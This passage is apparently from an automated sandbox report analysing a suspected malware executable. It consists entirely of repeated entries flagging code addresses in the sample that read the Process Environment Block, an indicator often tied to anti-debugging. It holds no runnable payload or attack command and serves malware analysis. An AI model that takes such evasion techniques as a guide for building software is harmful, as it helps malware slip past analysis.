                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01974180 mov eax, dword ptr fs:[00000030h]5_2_01974180
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01974180 mov eax, dword ptr fs:[00000030h]5_2_01974180
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CA197 mov eax, dword ptr fs:[00000030h]5_2_018CA197
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CA197 mov eax, dword ptr fs:[00000030h]5_2_018CA197
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CA197 mov eax, dword ptr fs:[00000030h]5_2_018CA197
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E1D0 mov eax, dword ptr fs:[00000030h]5_2_0194E1D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E1D0 mov eax, dword ptr fs:[00000030h]5_2_0194E1D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0194E1D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E1D0 mov eax, dword ptr fs:[00000030h]5_2_0194E1D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E1D0 mov eax, dword ptr fs:[00000030h]5_2_0194E1D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019961C3 mov eax, dword ptr fs:[00000030h]5_2_019961C3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019961C3 mov eax, dword ptr fs:[00000030h]5_2_019961C3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019001F8 mov eax, dword ptr fs:[00000030h]5_2_019001F8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A61E5 mov eax, dword ptr fs:[00000030h]5_2_019A61E5
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01990115 mov eax, dword ptr fs:[00000030h]5_2_01990115
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197A118 mov ecx, dword ptr fs:[00000030h]5_2_0197A118
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197A118 mov eax, dword ptr fs:[00000030h]5_2_0197A118
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197A118 mov eax, dword ptr fs:[00000030h]5_2_0197A118
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197A118 mov eax, dword ptr fs:[00000030h]5_2_0197A118
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E10E mov eax, dword ptr fs:[00000030h]5_2_0197E10E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E10E mov ecx, dword ptr fs:[00000030h]5_2_0197E10E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E10E mov eax, dword ptr fs:[00000030h]5_2_0197E10E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E10E mov eax, dword ptr fs:[00000030h]5_2_0197E10E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E10E mov ecx, dword ptr fs:[00000030h]5_2_0197E10E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E10E mov eax, dword ptr fs:[00000030h]5_2_0197E10E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E10E mov eax, dword ptr fs:[00000030h]5_2_0197E10E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E10E mov ecx, dword ptr fs:[00000030h]5_2_0197E10E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E10E mov eax, dword ptr fs:[00000030h]5_2_0197E10E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E10E mov ecx, dword ptr fs:[00000030h]5_2_0197E10E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01900124 mov eax, dword ptr fs:[00000030h]5_2_01900124
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01968158 mov eax, dword ptr fs:[00000030h]5_2_01968158
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01964144 mov eax, dword ptr fs:[00000030h]5_2_01964144
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01964144 mov eax, dword ptr fs:[00000030h]5_2_01964144
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01964144 mov ecx, dword ptr fs:[00000030h]5_2_01964144
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01964144 mov eax, dword ptr fs:[00000030h]5_2_01964144
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01964144 mov eax, dword ptr fs:[00000030h]5_2_01964144
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D6154 mov eax, dword ptr fs:[00000030h]5_2_018D6154
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D6154 mov eax, dword ptr fs:[00000030h]5_2_018D6154
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CC156 mov eax, dword ptr fs:[00000030h]5_2_018CC156
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D208A mov eax, dword ptr fs:[00000030h]5_2_018D208A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019960B8 mov eax, dword ptr fs:[00000030h]5_2_019960B8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019960B8 mov ecx, dword ptr fs:[00000030h]5_2_019960B8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019680A8 mov eax, dword ptr fs:[00000030h]5_2_019680A8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019520DE mov eax, dword ptr fs:[00000030h]5_2_019520DE
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019120F0 mov ecx, dword ptr fs:[00000030h]5_2_019120F0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D80E9 mov eax, dword ptr fs:[00000030h]5_2_018D80E9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CA0E3 mov ecx, dword ptr fs:[00000030h]5_2_018CA0E3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019560E0 mov eax, dword ptr fs:[00000030h]5_2_019560E0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CC0F0 mov eax, dword ptr fs:[00000030h]5_2_018CC0F0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01954000 mov ecx, dword ptr fs:[00000030h]5_2_01954000
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01972000 mov eax, dword ptr fs:[00000030h]5_2_01972000
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01972000 mov eax, dword ptr fs:[00000030h]5_2_01972000
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01972000 mov eax, dword ptr fs:[00000030h]5_2_01972000
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01972000 mov eax, dword ptr fs:[00000030h]5_2_01972000
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01972000 mov eax, dword ptr fs:[00000030h]5_2_01972000
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01972000 mov eax, dword ptr fs:[00000030h]5_2_01972000
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01972000 mov eax, dword ptr fs:[00000030h]5_2_01972000
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01972000 mov eax, dword ptr fs:[00000030h]5_2_01972000
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EE016 mov eax, dword ptr fs:[00000030h]5_2_018EE016
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EE016 mov eax, dword ptr fs:[00000030h]5_2_018EE016
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EE016 mov eax, dword ptr fs:[00000030h]5_2_018EE016
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EE016 mov eax, dword ptr fs:[00000030h]5_2_018EE016
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01966030 mov eax, dword ptr fs:[00000030h]5_2_01966030
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CA020 mov eax, dword ptr fs:[00000030h]5_2_018CA020
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CC020 mov eax, dword ptr fs:[00000030h]5_2_018CC020
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956050 mov eax, dword ptr fs:[00000030h]5_2_01956050
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D2050 mov eax, dword ptr fs:[00000030h]5_2_018D2050
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FC073 mov eax, dword ptr fs:[00000030h]5_2_018FC073
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F438F mov eax, dword ptr fs:[00000030h]5_2_018F438F
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F438F mov eax, dword ptr fs:[00000030h]5_2_018F438F
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CE388 mov eax, dword ptr fs:[00000030h]5_2_018CE388
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CE388 mov eax, dword ptr fs:[00000030h]5_2_018CE388
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CE388 mov eax, dword ptr fs:[00000030h]5_2_018CE388
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018C8397 mov eax, dword ptr fs:[00000030h]5_2_018C8397
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018C8397 mov eax, dword ptr fs:[00000030h]5_2_018C8397
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018C8397 mov eax, dword ptr fs:[00000030h]5_2_018C8397
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019743D4 mov eax, dword ptr fs:[00000030h]5_2_019743D4
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019743D4 mov eax, dword ptr fs:[00000030h]5_2_019743D4
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E3DB mov eax, dword ptr fs:[00000030h]5_2_0197E3DB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E3DB mov eax, dword ptr fs:[00000030h]5_2_0197E3DB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E3DB mov ecx, dword ptr fs:[00000030h]5_2_0197E3DB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197E3DB mov eax, dword ptr fs:[00000030h]5_2_0197E3DB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA3C0 mov eax, dword ptr fs:[00000030h]5_2_018DA3C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA3C0 mov eax, dword ptr fs:[00000030h]5_2_018DA3C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA3C0 mov eax, dword ptr fs:[00000030h]5_2_018DA3C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA3C0 mov eax, dword ptr fs:[00000030h]5_2_018DA3C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA3C0 mov eax, dword ptr fs:[00000030h]5_2_018DA3C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA3C0 mov eax, dword ptr fs:[00000030h]5_2_018DA3C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D83C0 mov eax, dword ptr fs:[00000030h]5_2_018D83C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D83C0 mov eax, dword ptr fs:[00000030h]5_2_018D83C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D83C0 mov eax, dword ptr fs:[00000030h]5_2_018D83C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D83C0 mov eax, dword ptr fs:[00000030h]5_2_018D83C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0198C3CD mov eax, dword ptr fs:[00000030h]5_2_0198C3CD
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019563C0 mov eax, dword ptr fs:[00000030h]5_2_019563C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E03E9 mov eax, dword ptr fs:[00000030h]5_2_018E03E9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E03E9 mov eax, dword ptr fs:[00000030h]5_2_018E03E9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E03E9 mov eax, dword ptr fs:[00000030h]5_2_018E03E9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E03E9 mov eax, dword ptr fs:[00000030h]5_2_018E03E9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E03E9 mov eax, dword ptr fs:[00000030h]5_2_018E03E9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E03E9 mov eax, dword ptr fs:[00000030h]5_2_018E03E9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E03E9 mov eax, dword ptr fs:[00000030h]5_2_018E03E9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E03E9 mov eax, dword ptr fs:[00000030h]5_2_018E03E9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019063FF mov eax, dword ptr fs:[00000030h]5_2_019063FF
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EE3F0 mov eax, dword ptr fs:[00000030h]5_2_018EE3F0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EE3F0 mov eax, dword ptr fs:[00000030h]5_2_018EE3F0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EE3F0 mov eax, dword ptr fs:[00000030h]5_2_018EE3F0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A30B mov eax, dword ptr fs:[00000030h]5_2_0190A30B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A30B mov eax, dword ptr fs:[00000030h]5_2_0190A30B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A30B mov eax, dword ptr fs:[00000030h]5_2_0190A30B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CC310 mov ecx, dword ptr fs:[00000030h]5_2_018CC310
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F0310 mov ecx, dword ptr fs:[00000030h]5_2_018F0310
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01978350 mov ecx, dword ptr fs:[00000030h]5_2_01978350
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195035C mov eax, dword ptr fs:[00000030h]5_2_0195035C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195035C mov eax, dword ptr fs:[00000030h]5_2_0195035C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195035C mov eax, dword ptr fs:[00000030h]5_2_0195035C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195035C mov ecx, dword ptr fs:[00000030h]5_2_0195035C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195035C mov eax, dword ptr fs:[00000030h]5_2_0195035C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195035C mov eax, dword ptr fs:[00000030h]5_2_0195035C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199A352 mov eax, dword ptr fs:[00000030h]5_2_0199A352
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01952349 mov eax, dword ptr fs:[00000030h]5_2_01952349
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197437C mov eax, dword ptr fs:[00000030h]5_2_0197437C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E284 mov eax, dword ptr fs:[00000030h]5_2_0190E284
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E284 mov eax, dword ptr fs:[00000030h]5_2_0190E284
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01950283 mov eax, dword ptr fs:[00000030h]5_2_01950283
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01950283 mov eax, dword ptr fs:[00000030h]5_2_01950283
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01950283 mov eax, dword ptr fs:[00000030h]5_2_01950283
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019662A0 mov eax, dword ptr fs:[00000030h]5_2_019662A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019662A0 mov ecx, dword ptr fs:[00000030h]5_2_019662A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019662A0 mov eax, dword ptr fs:[00000030h]5_2_019662A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019662A0 mov eax, dword ptr fs:[00000030h]5_2_019662A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019662A0 mov eax, dword ptr fs:[00000030h]5_2_019662A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019662A0 mov eax, dword ptr fs:[00000030h]5_2_019662A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA2C3 mov eax, dword ptr fs:[00000030h]5_2_018DA2C3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA2C3 mov eax, dword ptr fs:[00000030h]5_2_018DA2C3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA2C3 mov eax, dword ptr fs:[00000030h]5_2_018DA2C3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA2C3 mov eax, dword ptr fs:[00000030h]5_2_018DA2C3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA2C3 mov eax, dword ptr fs:[00000030h]5_2_018DA2C3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E02E1 mov eax, dword ptr fs:[00000030h]5_2_018E02E1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E02E1 mov eax, dword ptr fs:[00000030h]5_2_018E02E1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E02E1 mov eax, dword ptr fs:[00000030h]5_2_018E02E1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018C823B mov eax, dword ptr fs:[00000030h]5_2_018C823B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0198A250 mov eax, dword ptr fs:[00000030h]5_2_0198A250
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0198A250 mov eax, dword ptr fs:[00000030h]5_2_0198A250
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D6259 mov eax, dword ptr fs:[00000030h]5_2_018D6259
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01958243 mov eax, dword ptr fs:[00000030h]5_2_01958243
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01958243 mov ecx, dword ptr fs:[00000030h]5_2_01958243
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CA250 mov eax, dword ptr fs:[00000030h]5_2_018CA250
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018C826B mov eax, dword ptr fs:[00000030h]5_2_018C826B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01980274 mov eax, dword ptr fs:[00000030h]5_2_01980274
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01980274 mov eax, dword ptr fs:[00000030h]5_2_01980274
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01980274 mov eax, dword ptr fs:[00000030h]5_2_01980274
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01980274 mov eax, dword ptr fs:[00000030h]5_2_01980274
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01980274 mov eax, dword ptr fs:[00000030h]5_2_01980274
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01980274 mov eax, dword ptr fs:[00000030h]5_2_01980274
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01980274 mov eax, dword ptr fs:[00000030h]5_2_01980274
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01980274 mov eax, dword ptr fs:[00000030h]5_2_01980274
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01980274 mov eax, dword ptr fs:[00000030h]5_2_01980274
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01980274 mov eax, dword ptr fs:[00000030h]5_2_01980274
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01980274 mov eax, dword ptr fs:[00000030h]5_2_01980274
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01980274 mov eax, dword ptr fs:[00000030h]5_2_01980274
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D4260 mov eax, dword ptr fs:[00000030h]5_2_018D4260
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D4260 mov eax, dword ptr fs:[00000030h]5_2_018D4260
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D4260 mov eax, dword ptr fs:[00000030h]5_2_018D4260
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E59C mov eax, dword ptr fs:[00000030h]5_2_0190E59C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D2582 mov eax, dword ptr fs:[00000030h]5_2_018D2582
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D2582 mov ecx, dword ptr fs:[00000030h]5_2_018D2582
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01904588 mov eax, dword ptr fs:[00000030h]5_2_01904588
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019505A7 mov eax, dword ptr fs:[00000030h]5_2_019505A7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019505A7 mov eax, dword ptr fs:[00000030h]5_2_019505A7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019505A7 mov eax, dword ptr fs:[00000030h]5_2_019505A7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F45B1 mov eax, dword ptr fs:[00000030h]5_2_018F45B1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F45B1 mov eax, dword ptr fs:[00000030h]5_2_018F45B1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A5D0 mov eax, dword ptr fs:[00000030h]5_2_0190A5D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A5D0 mov eax, dword ptr fs:[00000030h]5_2_0190A5D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D65D0 mov eax, dword ptr fs:[00000030h]5_2_018D65D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E5CF mov eax, dword ptr fs:[00000030h]5_2_0190E5CF
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E5CF mov eax, dword ptr fs:[00000030h]5_2_0190E5CF
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D25E0 mov eax, dword ptr fs:[00000030h]5_2_018D25E0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C5ED mov eax, dword ptr fs:[00000030h]5_2_0190C5ED
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C5ED mov eax, dword ptr fs:[00000030h]5_2_0190C5ED
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01966500 mov eax, dword ptr fs:[00000030h]5_2_01966500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
